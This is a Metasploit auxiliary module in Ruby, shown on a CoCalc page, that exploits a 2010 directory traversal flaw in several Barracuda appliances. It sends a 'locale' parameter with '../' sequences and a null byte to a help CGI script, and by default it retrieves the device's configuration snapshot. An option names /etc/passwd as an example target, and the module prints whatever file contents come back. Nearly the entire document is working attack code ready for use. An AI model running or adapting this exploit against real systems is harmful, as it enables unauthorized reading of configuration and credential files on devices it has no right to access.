CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize
12
    super(
13
      'Name'           => 'Barracuda Multiple Product "locale" Directory Traversal',
14
      'Description'    => %q{
15
          This module exploits a directory traversal vulnerability present in
16
        several Barracuda products, including the Barracuda Spam and Virus Firewall,
17
        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
18
        this module will attempt to download the Barracuda configuration file.
19
      },
20
      'References'     =>
21
        [
22
          ['OSVDB', '68301'],
23
          ['URL', 'https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/'],
24
          ['EDB', '15130']
25
        ],
26
      'Author'         =>
27
        [
28
          'Tiago Ferreira <tiago.ccna[at]gmail.com>'
29
        ],
30
      'DisclosureDate' => 'Oct 08 2010',
31
      'License'        =>  MSF_LICENSE
32
    )
33

34
    register_options(
35
      [
36
        Opt::RPORT(8000),
37
        OptString.new('FILE', [ true,  "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
38
        OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
39
      ])
40
  end
41

42
  def run_host(ip)
43
    uri = normalize_uri(target_uri.path)
44
    file = datastore['FILE']
45
    payload = "?locale=/../../../../../../..#{file}%00"
46

47
    print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
48

49
    res = send_request_raw(
50
      {
51
        'method'  => 'GET',
52
        'uri'     => uri + payload,
53
      }, 25)
54

55
    if res.nil?
56
      print_error("#{full_uri} - Connection timed out")
57
      return
58
    end
59

60
    if (res.code == 200 and res.body)
61
      if res.body.match(/\<html\>(.*)\<\/html\>/im)
62
        html = $1
63

64
        if res.body =~ /barracuda\.css/
65
          if html.length > 100
66
            file_data = html.gsub(%r{</?[^>]+?>}, '')
67

68
            print_good("#{full_uri} - Barracuda - Vulnerable")
69
            print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
70
          else
71
            print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
72
          end
73
        elsif res.body =~ /help_page/
74
          print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
75
        else
76
          print_error("#{full_uri} - Barracuda - File not found or permission denied")
77
        end
78
      else
79
        print_error("#{full_uri} - Barracuda - No HTML was returned")
80
      end
81
    else
82
      print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
83
    end
84

85
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
86
  rescue ::Timeout::Error, ::Errno::EPIPE
87
  end
88
end
89

90